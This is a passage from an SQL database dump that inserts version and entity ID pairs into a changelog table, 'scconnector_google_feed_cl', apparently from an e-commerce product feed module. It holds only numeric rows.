(33060, 1679),
(33061, 1679),
(33062, 1679),
(33063, 1679),
(33064, 1679),
(33065, 1680),
(33066, 1680),
(33067, 1680),
(33068, 1680),
(33069, 1680),
(33070, 1680),
(33071, 1681),
(33072, 1681),
(33073, 1681),
(33074, 1681),
(33075, 1681),
(33076, 1681),
(33077, 1681),
(33078, 1681),
(33079, 1681),
(33080, 1682),
(33081, 1682),
(33082, 1682),
(33083, 1682),
(33084, 1682),
(33085, 1682),
(33086, 1683),
(33087, 1683),
(33088, 1683),
(33089, 1683),
(33090, 1683),
(33091, 1683),
(33092, 1684),
(33093, 1684),
(33094, 1684),
(33095, 1684),
(33096, 1684),
(33097, 1684),
(33098, 1685),
(33099, 1685),
(33100, 1685),
(33101, 1685),
(33102, 1685),
(33103, 1685),
(33104, 1686),
(33105, 1686),
(33106, 1686),
(33107, 1686),
(33108, 1686),
(33109, 1686),
(33110, 1687),
(33111, 1687),
(33112, 1687),
(33113, 1687),
(33114, 1687),
(33115, 1687),
(33116, 1688),
(33117, 1688),
(33118, 1688),
(33119, 1688),
(33120, 1688),
(33121, 1688),
(33122, 1689),
(33123, 1689),
(33124, 1689),
(33125, 1689),
(33126, 1689),
(33127, 1689),
(33128, 1690),
(33129, 1690),
(33130, 1690),
(33131, 1690),
(33132, 1690),
(33133, 1690),
(33134, 1691),
(33135, 1691),
(33136, 1691),
(33137, 1691),
(33138, 1691),
(33139, 1691),
(33140, 1692),
(33141, 1692),
(33142, 1692),
(33143, 1692),
(33144, 1692),
(33145, 1692),
(33146, 1693),
(33147, 1693),
(33148, 1693),
(33149, 1693),
(33150, 1693),
(33151, 1693),
(33152, 1694),
(33153, 1694),
(33154, 1694),
(33155, 1694),
(33156, 1694),
(33157, 1694),
(33158, 1695),
(33159, 1695),
(33160, 1695),
(33161, 1695),
(33162, 1695),
(33163, 1695),
(33164, 1696),
(33165, 1696),
(33166, 1696),
(33167, 1696),
(33168, 1696),
(33169, 1696),
(33170, 1697),
(33171, 1697),
(33172, 1697),
(33173, 1697),
(33174, 1697),
(33175, 1697),
(33176, 1697),
(33177, 1697),
(33178, 1697),
(33179, 1698),
(33180, 1698),
(33181, 1698),
(33182, 1698),
(33183, 1698),
(33184, 1698),
(33185, 1699),
(33186, 1699),
(33187, 1699),
(33188, 1699),
(33189, 1699),
(33190, 1699),
(33191, 1700),
(33192, 1700),
(33193, 1700),
(33194, 1700),
(33195, 1700),
(33196, 1700),
(33197, 1701),
(33198, 1701),
(33199, 1701),
(33200, 1701),
(33201, 1701),
(33202, 1701),
(33203, 1702),
(33204, 1702),
(33205, 1702),
(33206, 1702),
(33207, 1702),
(33208, 1702),
(33209, 1703),
(33210, 1703),
(33211, 1703),
(33212, 1703),
(33213, 1703),
(33214, 1703),
(33215, 1704),
(33216, 1704),
(33217, 1704),
(33218, 1704),
(33219, 1704),
(33220, 1704),
(33221, 1705),
(33222, 1705),
(33223, 1705),
(33224, 1705),
(33225, 1705),
(33226, 1705),
(33227, 1706),
(33228, 1706),
(33229, 1706),
(33230, 1706),
(33231, 1706),
(33232, 1706),
(33233, 1707),
(33234, 1707),
(33235, 1707),
(33236, 1707),
(33237, 1707),
(33238, 1707),
(33239, 1708),
(33240, 1708),
(33241, 1708),
(33242, 1708),
(33243, 1708),
(33244, 1708),
(33245, 1709),
(33246, 1709),
(33247, 1709),
(33248, 1709),
(33249, 1709),
(33250, 1709),
(33251, 1710),
(33252, 1710),
(33253, 1710),
(33254, 1710),
(33255, 1710),
(33256, 1710),
(33257, 1711),
(33258, 1711),
(33259, 1711),
(33260, 1711),
(33261, 1711),
(33262, 1711),
(33263, 1712),
(33264, 1712),
(33265, 1712),
(33266, 1712),
(33267, 1712),
(33268, 1712),
(33269, 1713),
(33270, 1713),
(33271, 1713),
(33272, 1713),
(33273, 1713),
(33274, 1713),
(33275, 1713),
(33276, 1713),
(33277, 1713),
(33278, 1714),
(33279, 1714),
(33280, 1714),
(33281, 1714),
(33282, 1714),
(33283, 1714),
(33284, 1715),
(33285, 1715),
(33286, 1715),
(33287, 1715),
(33288, 1715),
(33289, 1715),
(33290, 1716),
(33291, 1716),
(33292, 1716),
(33293, 1716),
(33294, 1716),
(33295, 1716),
(33296, 1717),
(33297, 1717),
(33298, 1717);
INSERT INTO `scconnector_google_feed_cl` (`version_id`, `entity_id`) VALUES
(33299, 1717),
(33300, 1717),
(33301, 1717),
(33302, 1718),
(33303, 1718),
(33304, 1718),
(33305, 1718),
(33306, 1718),
(33307, 1718),
(33308, 1719),
(33309, 1719),
(33310, 1719),
(33311, 1719),
(33312, 1719),
(33313, 1719),
(33314, 1720),
(33315, 1720),
(33316, 1720),
(33317, 1720),
(33318, 1720),
(33319, 1720),
(33320, 1721),
(33321, 1721),
(33322, 1721),
(33323, 1721),
(33324, 1721),
(33325, 1721),
(33326, 1722),
(33327, 1722),
(33328, 1722),
(33329, 1722),
(33330, 1722),
(33331, 1722),
(33332, 1723),
(33333, 1723),
(33334, 1723),
(33335, 1723),
(33336, 1723),
(33337, 1723),
(33338, 1724),
(33339, 1724),
(33340, 1724),
(33341, 1724),
(33342, 1724),
(33343, 1724),
(33344, 1725),
(33345, 1725),
(33346, 1725),
(33347, 1725),
(33348, 1725),
(33349, 1725),
(33350, 1726),
(33351, 1726),
(33352, 1726),
(33353, 1726),
(33354, 1726),
(33355, 1726),
(33356, 1727),
(33357, 1727),
(33358, 1727),
(33359, 1727),
(33360, 1727),
(33361, 1727),
(33362, 1728),
(33363, 1728),
(33364, 1728),
(33365, 1728),
(33366, 1728),
(33367, 1728),
(33368, 1729),
(33369, 1729),
(33370, 1729),
(33371, 1729),
(33372, 1729),
(33373, 1729),
(33374, 1729),
(33375, 1729),
(33376, 1729),
(33377, 1730),
(33378, 1730),
(33379, 1730),
(33380, 1730),
(33381, 1730),
(33382, 1730),
(33383, 1731),
(33384, 1731),
(33385, 1731),
(33386, 1731),
(33387, 1731),
(33388, 1731),
(33389, 1732),
(33390, 1732),
(33391, 1732),
(33392, 1732),
(33393, 1732),
(33394, 1732),
(33395, 1733),
(33396, 1733),
(33397, 1733),
(33398, 1733),
(33399, 1733),
(33400, 1733),
(33401, 1734),
(33402, 1734),
(33403, 1734),
(33404, 1734),
(33405, 1734),
(33406, 1734),
(33407, 1735),
(33408, 1735),
(33409, 1735),
(33410, 1735),
(33411, 1735),
(33412, 1735),
(33413, 1736),
(33414, 1736),
(33415, 1736),
(33416, 1736),
(33417, 1736),
(33418, 1736),
(33419, 1737),
(33420, 1737),
(33421, 1737),
(33422, 1737),
(33423, 1737),
(33424, 1737),
(33425, 1738),
(33426, 1738),
(33427, 1738),
(33428, 1738),
(33429, 1738),
(33430, 1738),
(33431, 1739),
(33432, 1739),
(33433, 1739),
(33434, 1739),
(33435, 1739),
(33436, 1739),
(33437, 1740),
(33438, 1740),
(33439, 1740),
(33440, 1740),
(33441, 1740),
(33442, 1740),
(33443, 1741),
(33444, 1741),
(33445, 1741),
(33446, 1741),
(33447, 1741),
(33448, 1741),
(33449, 1742),
(33450, 1742),
(33451, 1742),
(33452, 1742),
(33453, 1742),
(33454, 1742),
(33455, 1743),
(33456, 1743),
(33457, 1743),
(33458, 1743),
(33459, 1743),
(33460, 1743),
(33461, 1744),
(33462, 1744),
(33463, 1744),
(33464, 1744),
(33465, 1744),
(33466, 1744),
(33467, 1745),
(33468, 1745),
(33469, 1745),
(33470, 1745),
(33471, 1745),
(33472, 1745),
(33473, 1745),
(33474, 1745),
(33475, 1745),
(33476, 1746),
(33477, 1746),
(33478, 1746),
(33479, 1746),
(33480, 1746),
(33481, 1746),
(33482, 1747),
(33483, 1747),
(33484, 1747),
(33485, 1747),
(33486, 1747),
(33487, 1747),
(33488, 1748),
(33489, 1748),
(33490, 1748),
(33491, 1748),
(33492, 1748),
(33493, 1748),
(33494, 1749),
(33495, 1749),
(33496, 1749),
(33497, 1749),
(33498, 1749),
(33499, 1749),
(33500, 1750),
(33501, 1750),
(33502, 1750),
(33503, 1750),
(33504, 1750),
(33505, 1750),
(33506, 1751),
(33507, 1751),
(33508, 1751),
(33509, 1751),
(33510, 1751),
(33511, 1751),
(33512, 1752),
(33513, 1752),
(33514, 1752),
(33515, 1752),
(33516, 1752),
(33517, 1752),
(33518, 1753),
(33519, 1753),
(33520, 1753),
(33521, 1753),
(33522, 1753),
(33523, 1753),
(33524, 1754),
(33525, 1754),
(33526, 1754),
(33527, 1754),
(33528, 1754),
(33529, 1754),
(33530, 1755),
(33531, 1755),
(33532, 1755),
(33533, 1755),
(33534, 1755),
(33535, 1755),
(33536, 1756),
(33537, 1756),
(33538, 1756),
(33539, 1756),
(33540, 1756),
(33541, 1756),
(33542, 1757),
(33543, 1757),
(33544, 1757),
(33545, 1757),
(33546, 1757),
(33547, 1757),
(33548, 1758),
(33549, 1758),
(33550, 1758),
(33551, 1758),
(33552, 1758),
(33553, 1758),
(33554, 1759),
(33555, 1759),
(33556, 1759),
(33557, 1759),
(33558, 1759),
(33559, 1759),
(33560, 1660),
(33561, 1660),
(33562, 1661),
(33563, 1661),
(33564, 1662),
(33565, 1662),
(33566, 1663),
(33567, 1663),
(33568, 1664),
(33569, 1664),
(33570, 1665),
(33571, 1666),
(33572, 1666),
(33573, 1667),
(33574, 1667),
(33575, 1668),
(33576, 1668),
(33577, 1669),
(33578, 1669),
(33579, 1670),
(33580, 1670),
(33581, 1671),
(33582, 1671),
(33583, 1672),
(33584, 1672),
(33585, 1673),
(33586, 1673),
(33587, 1674),
(33588, 1674),
(33589, 1675),
(33590, 1675),
(33591, 1676),
(33592, 1676),
(33593, 1677),
(33594, 1677),
(33595, 1678),
(33596, 1678),
(33597, 1679),
(33598, 1679),
(33599, 1680),
(33600, 1680),
(33601, 1681),
(33602, 1682),
(33603, 1682),
(33604, 1683),
(33605, 1683),
(33606, 1684),
(33607, 1684),
(33608, 1685),
(33609, 1685),
(33610, 1686),
(33611, 1686),
(33612, 1687),
(33613, 1687),
(33614, 1688),
(33615, 1688),
(33616, 1689),
(33617, 1689),
(33618, 1690),
(33619, 1690),
(33620, 1691),
(33621, 1691),
(33622, 1692),
(33623, 1692),
(33624, 1693),
(33625, 1693),
(33626, 1694),
(33627, 1694),
(33628, 1695),
(33629, 1695),
(33630, 1696),
(33631, 1696),
(33632, 1697),
(33633, 1698),
(33634, 1698),
(33635, 1699),
(33636, 1699),
(33637, 1700),
(33638, 1700),
(33639, 1701),
(33640, 1701),
(33641, 1702),
(33642, 1702),
(33643, 1703),
(33644, 1703),
(33645, 1704),
(33646, 1704),
(33647, 1705),
(33648, 1705),
(33649, 1706),
(33650, 1706),
(33651, 1707),
(33652, 1707),
(33653, 1708),
(33654, 1708),
(33655, 1709),
(33656, 1709),
(33657, 1710),
(33658, 1710),
(33659, 1711),
(33660, 1711),
(33661, 1712),
(33662, 1712),
(33663, 1713),
(33664, 1714),
(33665, 1714),
(33666, 1715),
(33667, 1715),
(33668, 1716),
(33669, 1716),
(33670, 1717),
(33671, 1717),
(33672, 1718),
(33673, 1718),
(33674, 1719),
(33675, 1719),
(33676, 1720),
(33677, 1720),
(33678, 1721),
(33679, 1721),
(33680, 1722),
(33681, 1722),
(33682, 1723),
(33683, 1723),
(33684, 1724),
(33685, 1724),
(33686, 1725),
(33687, 1725),
(33688, 1726),
(33689, 1726),
(33690, 1727),
(33691, 1727),
(33692, 1728),
(33693, 1728),
(33694, 1729),
(33695, 1730),
(33696, 1730),
(33697, 1731),
(33698, 1731),
(33699, 1732),
(33700, 1732),
(33701, 1733),
(33702, 1733),
(33703, 1734),
(33704, 1734),
(33705, 1735),
(33706, 1735),
(33707, 1736),
(33708, 1736),
(33709, 1737),
(33710, 1737),
(33711, 1738),
(33712, 1738),
(33713, 1739),
(33714, 1739),
(33715, 1740),
(33716, 1740),
(33717, 1741),
(33718, 1741),
(33719, 1742),
(33720, 1742),
(33721, 1743),
(33722, 1743),
(33723, 1744),
(33724, 1744),
(33725, 1745),
(33726, 1746),
(33727, 1746),
(33728, 1747),
(33729, 1747),
(33730, 1748),
(33731, 1748),
(33732, 1749),
(33733, 1749),
(33734, 1750),
(33735, 1750),
(33736, 1751),
(33737, 1751),
(33738, 1752),
(33739, 1752),
(33740, 1753),
(33741, 1753),
(33742, 1754),
(33743, 1754),
(33744, 1755),
(33745, 1755),
(33746, 1756),
(33747, 1756),
(33748, 1757),
(33749, 1757),
(33750, 1758),
(33751, 1758),
(33752, 1759),
(33753, 1759),
(33754, 1760),
(33755, 1761),
(33756, 1762),
(33757, 1763),
(33758, 1764),
(33759, 1765),
(33760, 1766),
(33761, 1767),
(33762, 1768),
(33763, 1769),
(33764, 1770),
(33765, 1771),
(33766, 1772),
(33767, 1773),
(33768, 1774),
(33769, 1775),
(33770, 1776),
(33771, 1777),
(33772, 1778),
(33773, 1779),
(33774, 1780),
(33775, 1781),
(33776, 1782),
(33777, 1783),
(33778, 1784),
(33779, 1785),
(33780, 1786),
(33781, 1787),
(33782, 1788),
(33783, 1789),
(33784, 1790),
(33785, 1791),
(33786, 1792),
(33787, 1793),
(33788, 1794),
(33789, 1795),
(33790, 1796),
(33791, 1797),
(33792, 1798),
(33793, 1799),
(33794, 1800),
(33795, 1801),
(33796, 1802),
(33797, 1803),
(33798, 1804),
(33799, 1805),
(33800, 1806),
(33801, 1807),
(33802, 1808),
(33803, 1809),
(33804, 1810),
(33805, 1811),
(33806, 1812),
(33807, 1813),
(33808, 1814),
(33809, 1815),
(33810, 1816),
(33811, 1817),
(33812, 1818),
(33813, 1819),
(33814, 1820),
(33815, 1821),
(33816, 1822),
(33817, 1823),
(33818, 1824),
(33819, 1825),
(33820, 1826),
(33821, 1827),
(33822, 1828),
(33823, 1829),
(33824, 1830),
(33825, 1831),
(33826, 1832),
(33827, 1833),
(33828, 1834),
(33829, 1835),
(33830, 1836),
(33831, 1837),
(33832, 1838),
(33833, 1839),
(33834, 1840),
(33835, 1841),
(33836, 1842),
(33837, 1843),
(33838, 1844),
(33839, 1845),
(33840, 1846),
(33841, 1847),
(33842, 1848),
(33843, 1849),
(33844, 1850),
(33845, 1851),
(33846, 1852),
(33847, 1853),
(33848, 1854),
(33849, 1855),
(33850, 1856),
(33851, 1857),
(33852, 1858),
(33853, 1859),
(33854, 1760),
(33855, 1761),
(33856, 1761),
(33857, 1761),
(33858, 1762),
(33859, 1762),
(33860, 1763),
(33861, 1764),
(33862, 1765),
(33863, 1765),
(33864, 1766),
(33865, 1767),
(33866, 1768),
(33867, 1768),
(33868, 1769),
(33869, 1770),
(33870, 1771),
(33871, 1771),
(33872, 1772),
(33873, 1773),
(33874, 1774),
(33875, 1774),
(33876, 1775),
(33877, 1776),
(33878, 1777),
(33879, 1777),
(33880, 1778),
(33881, 1778),
(33882, 1778),
(33883, 1779),
(33884, 1780),
(33885, 1781),
(33886, 1781),
(33887, 1781),
(33888, 1782),
(33889, 1783),
(33890, 1784),
(33891, 1784),
(33892, 1784),
(33893, 1785),
(33894, 1786),
(33895, 1787),
(33896, 1787),
(33897, 1787),
(33898, 1788),
(33899, 1789),
(33900, 1790),
(33901, 1790),
(33902, 1790),
(33903, 1791),
(33904, 1792),
(33905, 1793),
(33906, 1793),
(33907, 1793),
(33908, 1794),
(33909, 1794),
(33910, 1794),
(33911, 1795),
(33912, 1796),
(33913, 1797),
(33914, 1797),
(33915, 1797),
(33916, 1798),
(33917, 1799),
(33918, 1800),
(33919, 1800),
(33920, 1800),
(33921, 1801),
(33922, 1802),
(33923, 1803),
(33924, 1803),
(33925, 1803),
(33926, 1804),
(33927, 1805),
(33928, 1806),
(33929, 1806),
(33930, 1806),
(33931, 1807),
(33932, 1808),
(33933, 1809),
(33934, 1809),
(33935, 1809),
(33936, 1810),
(33937, 1811),
(33938, 1811),
(33939, 1812),
(33940, 1813),
(33941, 1814),
(33942, 1814),
(33943, 1815),
(33944, 1816),
(33945, 1817),
(33946, 1817),
(33947, 1818),
(33948, 1819),
(33949, 1820),
(33950, 1820),
(33951, 1821),
(33952, 1822),
(33953, 1823),
(33954, 1823),
(33955, 1824),
(33956, 1825),
(33957, 1825),
(33958, 1826),
(33959, 1827),
(33960, 1827),
(33961, 1828),
(33962, 1829),
(33963, 1830),
(33964, 1830),
(33965, 1831),
(33966, 1832),
(33967, 1832),
(33968, 1833),
(33969, 1833),
(33970, 1834),
(33971, 1835),
(33972, 1836),
(33973, 1836),
(33974, 1837),
(33975, 1838),
(33976, 1839),
(33977, 1839),
(33978, 1840),
(33979, 1841),
(33980, 1841),
(33981, 1841),
(33982, 1842),
(33983, 1843),
(33984, 1844),
(33985, 1844),
(33986, 1844),
(33987, 1845),
(33988, 1846),
(33989, 1846),
(33990, 1846),
(33991, 1847),
(33992, 1848),
(33993, 1848),
(33994, 1848),
(33995, 1848),
(33996, 1849),
(33997, 1850),
(33998, 1851),
(33999, 1851),
(34000, 1851),
(34001, 1851),
(34002, 1852),
(34003, 1853),
(34004, 1853),
(34005, 1853),
(34006, 1853),
(34007, 1854),
(34008, 1855),
(34009, 1855),
(34010, 1855),
(34011, 1856),
(34012, 1857),
(34013, 1858),
(34014, 1858),
(34015, 1858),
(34016, 1859),
(34017, 1760),
(34018, 1760),
(34019, 1760),
(34020, 1760),
(34021, 1760),
(34022, 1760),
(34023, 1760),
(34024, 1761),
(34025, 1761),
(34026, 1761),
(34027, 1761),
(34028, 1761),
(34029, 1761),
(34030, 1761),
(34031, 1761),
(34032, 1761),
(34033, 1761),
(34034, 1761),
(34035, 1762),
(34036, 1762),
(34037, 1762),
(34038, 1762),
(34039, 1762),
(34040, 1762),
(34041, 1762),
(34042, 1763),
(34043, 1763),
(34044, 1763),
(34045, 1763),
(34046, 1763),
(34047, 1763),
(34048, 1763),
(34049, 1764),
(34050, 1764),
(34051, 1764),
(34052, 1764),
(34053, 1764),
(34054, 1764),
(34055, 1764),
(34056, 1765),
(34057, 1765),
(34058, 1765),
(34059, 1765),
(34060, 1765),
(34061, 1765),
(34062, 1765),
(34063, 1766),
(34064, 1766),
(34065, 1766),
(34066, 1766),
(34067, 1766),
(34068, 1766),
(34069, 1766),
(34070, 1767),
(34071, 1767),
(34072, 1767),
(34073, 1767),
(34074, 1767),
(34075, 1767),
(34076, 1767),
(34077, 1768),
(34078, 1768),
(34079, 1768),
(34080, 1768),
(34081, 1768),
(34082, 1768),
(34083, 1768),
(34084, 1769),
(34085, 1769),
(34086, 1769),
(34087, 1769),
(34088, 1769),
(34089, 1769),
(34090, 1769),
(34091, 1770),
(34092, 1770),
(34093, 1770),
(34094, 1770),
(34095, 1770),
(34096, 1770),
(34097, 1770),
(34098, 1771),
(34099, 1771),
(34100, 1771),
(34101, 1771),
(34102, 1771),
(34103, 1771),
(34104, 1771),
(34105, 1772),
(34106, 1772),
(34107, 1772),
(34108, 1772),
(34109, 1772),
(34110, 1772),
(34111, 1772),
(34112, 1773),
(34113, 1773),
(34114, 1773),
(34115, 1773),
(34116, 1773),
(34117, 1773),
(34118, 1773),
(34119, 1774),
(34120, 1774),
(34121, 1774),
(34122, 1774),
(34123, 1774),
(34124, 1774),
(34125, 1774),
(34126, 1775),
(34127, 1775),
(34128, 1775),
(34129, 1775),
(34130, 1775),
(34131, 1775),
(34132, 1775),
(34133, 1776),
(34134, 1776),
(34135, 1776),
(34136, 1776),
(34137, 1776),
(34138, 1776),
(34139, 1776),
(34140, 1777),
(34141, 1777),
(34142, 1777),
(34143, 1777),
(34144, 1777),
(34145, 1777),
(34146, 1777),
(34147, 1777),
(34148, 1777),
(34149, 1777),
(34150, 1777),
(34151, 1778),
(34152, 1778),
(34153, 1778),
(34154, 1778),
(34155, 1778),
(34156, 1778),
(34157, 1778),
(34158, 1779),
(34159, 1779),
(34160, 1779),
(34161, 1779),
(34162, 1779),
(34163, 1779),
(34164, 1779),
(34165, 1780),
(34166, 1780),
(34167, 1780),
(34168, 1780),
(34169, 1780),
(34170, 1780),
(34171, 1780),
(34172, 1781),
(34173, 1781),
(34174, 1781),
(34175, 1781),
(34176, 1781),
(34177, 1781),
(34178, 1781),
(34179, 1782),
(34180, 1782),
(34181, 1782),
(34182, 1782),
(34183, 1782),
(34184, 1782),
(34185, 1782),
(34186, 1783),
(34187, 1783),
(34188, 1783),
(34189, 1783),
(34190, 1783),
(34191, 1783),
(34192, 1783),
(34193, 1784),
(34194, 1784),
(34195, 1784),
(34196, 1784),
(34197, 1784),
(34198, 1784),
(34199, 1784),
(34200, 1785),
(34201, 1785),
(34202, 1785),
(34203, 1785),
(34204, 1785),
(34205, 1785),
(34206, 1785),
(34207, 1786),
(34208, 1786),
(34209, 1786),
(34210, 1786),
(34211, 1786),
(34212, 1786),
(34213, 1786),
(34214, 1787),
(34215, 1787),
(34216, 1787),
(34217, 1787),
(34218, 1787),
(34219, 1787),
(34220, 1787),
(34221, 1788),
(34222, 1788),
(34223, 1788),
(34224, 1788),
(34225, 1788),
(34226, 1788),
(34227, 1788),
(34228, 1789),
(34229, 1789),
(34230, 1789),
(34231, 1789),
(34232, 1789),
(34233, 1789),
(34234, 1789),
(34235, 1790),
(34236, 1790),
(34237, 1790),
(34238, 1790),
(34239, 1790),
(34240, 1790),
(34241, 1790),
(34242, 1791),
(34243, 1791),
(34244, 1791),
(34245, 1791),
(34246, 1791),
(34247, 1791),
(34248, 1791),
(34249, 1792),
(34250, 1792),
(34251, 1792),
(34252, 1792),
(34253, 1792),
(34254, 1792),
(34255, 1792),
(34256, 1793),
(34257, 1793),
(34258, 1793),
(34259, 1793),
(34260, 1793),
(34261, 1793),
(34262, 1793),
(34263, 1793),
(34264, 1793),
(34265, 1793),
(34266, 1793),
(34267, 1794),
(34268, 1794),
(34269, 1794),
(34270, 1794),
(34271, 1794),
(34272, 1794),
(34273, 1794),
(34274, 1795),
(34275, 1795),
(34276, 1795),
(34277, 1795),
(34278, 1795),
(34279, 1795),
(34280, 1795),
(34281, 1796),
(34282, 1796),
(34283, 1796),
(34284, 1796),
(34285, 1796),
(34286, 1796),
(34287, 1796),
(34288, 1797),
(34289, 1797),
(34290, 1797),
(34291, 1797),
(34292, 1797),
(34293, 1797),
(34294, 1797),
(34295, 1798),
(34296, 1798),
(34297, 1798),
(34298, 1798),
(34299, 1798),
(34300, 1798),
(34301, 1798),
(34302, 1799),
(34303, 1799),
(34304, 1799),
(34305, 1799),
(34306, 1799),
(34307, 1799),
(34308, 1799),
(34309, 1800),
(34310, 1800),
(34311, 1800),
(34312, 1800),
(34313, 1800),
(34314, 1800),
(34315, 1800),
(34316, 1801),
(34317, 1801),
(34318, 1801),
(34319, 1801),
(34320, 1801),
(34321, 1801),
(34322, 1801),
(34323, 1802),
(34324, 1802),
(34325, 1802),
(34326, 1802),
(34327, 1802),
(34328, 1802),
(34329, 1802),
(34330, 1803),
(34331, 1803),
(34332, 1803),
(34333, 1803),
(34334, 1803),
(34335, 1803),
(34336, 1803),
(34337, 1804),
(34338, 1804),
(34339, 1804),
(34340, 1804),
(34341, 1804),
(34342, 1804),
(34343, 1804),
(34344, 1805),
(34345, 1805),
(34346, 1805),
(34347, 1805),
(34348, 1805),
(34349, 1805),
(34350, 1805),
(34351, 1806),
(34352, 1806),
(34353, 1806),
(34354, 1806),
(34355, 1806),
(34356, 1806),
(34357, 1806),
(34358, 1807),
(34359, 1807),
(34360, 1807),
(34361, 1807),
(34362, 1807),
(34363, 1807),
(34364, 1807),
(34365, 1808),
(34366, 1808),
(34367, 1808),
(34368, 1808),
(34369, 1808),
(34370, 1808),
(34371, 1808),
(34372, 1809),
(34373, 1809),
(34374, 1809),
(34375, 1809),
(34376, 1809),
(34377, 1809),
(34378, 1809),
(34379, 1809),
(34380, 1809),
(34381, 1809),
(34382, 1809),
(34383, 1810),
(34384, 1810),
(34385, 1810),
(34386, 1810),
(34387, 1810),
(34388, 1810),
(34389, 1810),
(34390, 1811),
(34391, 1811),
(34392, 1811),
(34393, 1811),
(34394, 1811),
(34395, 1811),
(34396, 1811),
(34397, 1812),
(34398, 1812),
(34399, 1812),
(34400, 1812),
(34401, 1812),
(34402, 1812),
(34403, 1812),
(34404, 1813),
(34405, 1813),
(34406, 1813),
(34407, 1813),
(34408, 1813),
(34409, 1813),
(34410, 1813),
(34411, 1814),
(34412, 1814),
(34413, 1814),
(34414, 1814),
(34415, 1814),
(34416, 1814),
(34417, 1814),
(34418, 1815),
(34419, 1815),
(34420, 1815),
(34421, 1815),
(34422, 1815),
(34423, 1815),
(34424, 1815),
(34425, 1816),
(34426, 1816),
(34427, 1816),
(34428, 1816),
(34429, 1816),
(34430, 1816),
(34431, 1816),
(34432, 1817),
(34433, 1817),
(34434, 1817),
(34435, 1817),
(34436, 1817),
(34437, 1817),
(34438, 1817),
(34439, 1818),
(34440, 1818),
(34441, 1818),
(34442, 1818),
(34443, 1818),
(34444, 1818),
(34445, 1818),
(34446, 1819),
(34447, 1819),
(34448, 1819),
(34449, 1819),
(34450, 1819),
(34451, 1819),
(34452, 1819),
(34453, 1820),
(34454, 1820),
(34455, 1820),
(34456, 1820),
(34457, 1820),
(34458, 1820),
(34459, 1820),
(34460, 1821),
(34461, 1821),
(34462, 1821),
(34463, 1821),
(34464, 1821),
(34465, 1821),
(34466, 1821),
(34467, 1822),
(34468, 1822),
(34469, 1822),
(34470, 1822),
(34471, 1822),
(34472, 1822),
(34473, 1822),
(34474, 1823),
(34475, 1823),
(34476, 1823),
(34477, 1823),
(34478, 1823),
(34479, 1823),
(34480, 1823),
(34481, 1824),
(34482, 1824),
(34483, 1824),
(34484, 1824),
(34485, 1824),
(34486, 1824),
(34487, 1824),
(34488, 1825),
(34489, 1825),
(34490, 1825),
(34491, 1825),
(34492, 1825),
(34493, 1825),
(34494, 1825),
(34495, 1825),
(34496, 1825),
(34497, 1825),
(34498, 1825),
(34499, 1826),
(34500, 1826),
(34501, 1826),
(34502, 1826),
(34503, 1826),
(34504, 1826),
(34505, 1826),
(34506, 1827),
(34507, 1827),
(34508, 1827),
(34509, 1827),
(34510, 1827),
(34511, 1827),
(34512, 1827),
(34513, 1828),
(34514, 1828),
(34515, 1828),
(34516, 1828),
(34517, 1828),
(34518, 1828),
(34519, 1828),
(34520, 1829),
(34521, 1829),
(34522, 1829),
(34523, 1829),
(34524, 1829),
(34525, 1829),
(34526, 1829),
(34527, 1830),
(34528, 1830),
(34529, 1830),
(34530, 1830),
(34531, 1830),
(34532, 1830),
(34533, 1830),
(34534, 1831),
(34535, 1831),
(34536, 1831),
(34537, 1831),
(34538, 1831),
(34539, 1831),
(34540, 1831),
(34541, 1832),
(34542, 1832),
(34543, 1832),
(34544, 1832),
(34545, 1832),
(34546, 1832),
(34547, 1832),
(34548, 1832),
(34549, 1832),
(34550, 1832),
(34551, 1832),
(34552, 1833),
(34553, 1833),
(34554, 1833),
(34555, 1833),
(34556, 1833),
(34557, 1833),
(34558, 1833),
(34559, 1834),
(34560, 1834),
(34561, 1834),
(34562, 1834),
(34563, 1834),
(34564, 1834),
(34565, 1834),
(34566, 1835),
(34567, 1835),
(34568, 1835),
(34569, 1835),
(34570, 1835),
(34571, 1835),
(34572, 1835),
(34573, 1836),
(34574, 1836),
(34575, 1836),
(34576, 1836),
(34577, 1836),
(34578, 1836),
(34579, 1836),
(34580, 1837),
(34581, 1837),
(34582, 1837),
(34583, 1837),
(34584, 1837),
(34585, 1837),
(34586, 1837),
(34587, 1838),
(34588, 1838),
(34589, 1838),
(34590, 1838),
(34591, 1838),
(34592, 1838),
(34593, 1838),
(34594, 1839),
(34595, 1839),
(34596, 1839),
(34597, 1839),
(34598, 1839),
(34599, 1839),
(34600, 1839),
(34601, 1839),
(34602, 1839),
(34603, 1839),
(34604, 1839),
(34605, 1840),
(34606, 1840),
(34607, 1840),
(34608, 1840),
(34609, 1840),
(34610, 1840),
(34611, 1840),
(34612, 1841),
(34613, 1841),
(34614, 1841),
(34615, 1841),
(34616, 1841),
(34617, 1841),
(34618, 1841),
(34619, 1842),
(34620, 1842),
(34621, 1842),
(34622, 1842),
(34623, 1842),
(34624, 1842),
(34625, 1842),
(34626, 1843),
(34627, 1843),
(34628, 1843),
(34629, 1843),
(34630, 1843),
(34631, 1843),
(34632, 1843),
(34633, 1844),
(34634, 1844),
(34635, 1844),
(34636, 1844),
(34637, 1844),
(34638, 1844),
(34639, 1844),
(34640, 1845),
(34641, 1845),
(34642, 1845),
(34643, 1845),
(34644, 1845),
(34645, 1845),
(34646, 1845),
(34647, 1846),
(34648, 1846),
(34649, 1846),
(34650, 1846),
(34651, 1846),
(34652, 1846),
(34653, 1846),
(34654, 1846),
(34655, 1846),
(34656, 1846),
(34657, 1846),
(34658, 1847),
(34659, 1847),
(34660, 1847),
(34661, 1847),
(34662, 1847),
(34663, 1847),
(34664, 1847),
(34665, 1848),
(34666, 1848),
(34667, 1848),
(34668, 1848),
(34669, 1848),
(34670, 1848),
(34671, 1848),
(34672, 1849),
(34673, 1849),
(34674, 1849),
(34675, 1849),
(34676, 1849),
(34677, 1849),
(34678, 1849),
(34679, 1850),
(34680, 1850),
(34681, 1850),
(34682, 1850),
(34683, 1850),
(34684, 1850),
(34685, 1850),
(34686, 1851),
(34687, 1851),
(34688, 1851),
(34689, 1851),
(34690, 1851),
(34691, 1851),
(34692, 1851),
(34693, 1852),
(34694, 1852),
(34695, 1852),
(34696, 1852),
(34697, 1852),
(34698, 1852),
(34699, 1852),
(34700, 1853),
(34701, 1853),
(34702, 1853),
(34703, 1853),
(34704, 1853),
(34705, 1853),
(34706, 1853),
(34707, 1853),
(34708, 1853),
(34709, 1853),
(34710, 1853),
(34711, 1854),
(34712, 1854),
(34713, 1854),
(34714, 1854),
(34715, 1854),
(34716, 1854),
(34717, 1854),
(34718, 1855),
(34719, 1855),
(34720, 1855),
(34721, 1855),
